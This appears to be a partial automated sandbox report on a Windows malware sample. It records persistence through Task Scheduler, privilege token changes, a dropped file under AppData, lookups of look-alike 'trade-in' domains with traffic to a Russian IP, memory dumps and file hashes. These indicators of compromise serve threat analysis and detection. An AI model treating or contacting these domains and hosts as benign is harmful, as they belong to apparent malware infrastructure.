N/A N/A C:\Users\Admin\AppData\Roaming\thdutdt N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe

"C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe"

C:\Users\Admin\AppData\Roaming\thdutdt

C:\Users\Admin\AppData\Roaming\thdutdt

Network

Country Destination Domain Proto
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 trad-einmyus.com udp
RU 81.94.159.197:80 trad-einmyus.com tcp
US 8.8.8.8:53 197.159.94.81.in-addr.arpa udp
US 8.8.8.8:53 tradein-myus.com udp
US 8.8.8.8:53 trade-inmyus.com udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 45.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 73.239.69.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

memory/2356-2-0x00000000001F0000-0x00000000001FB000-memory.dmp

memory/2356-1-0x00000000007D0000-0x00000000008D0000-memory.dmp

memory/2356-3-0x0000000000400000-0x0000000000720000-memory.dmp

memory/3344-4-0x0000000000BE0000-0x0000000000BF6000-memory.dmp

memory/2356-5-0x0000000000400000-0x0000000000720000-memory.dmp

C:\Users\Admin\AppData\Roaming\thdutdt

MD5 15fbdb93344afb1b663ace05ee0d40c1
SHA1 03cc060e4c749212cdbce07aeed5623e4f94c27e
SHA256 1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50
SHA512 60f19cc94ff20a2675f906bdd4166df49336018d7362e03386e3dc2bf886ee35e31f4d0955738bea39a0943bea03661cb00405ff03736e9c2349f24b028bcabb

memory/1012-14-0x0000000000A50000-0x0000000000B50000-memory.dmp

memory/1012-15-0x0000000000400000-0x0000000000720000-memory.dmp

memory/3344-16-0x00000000029C0000-0x00000000029D6000-memory.dmp

memory/1012-19-0x0000000000400000-0x0000000000720000-memory.dmp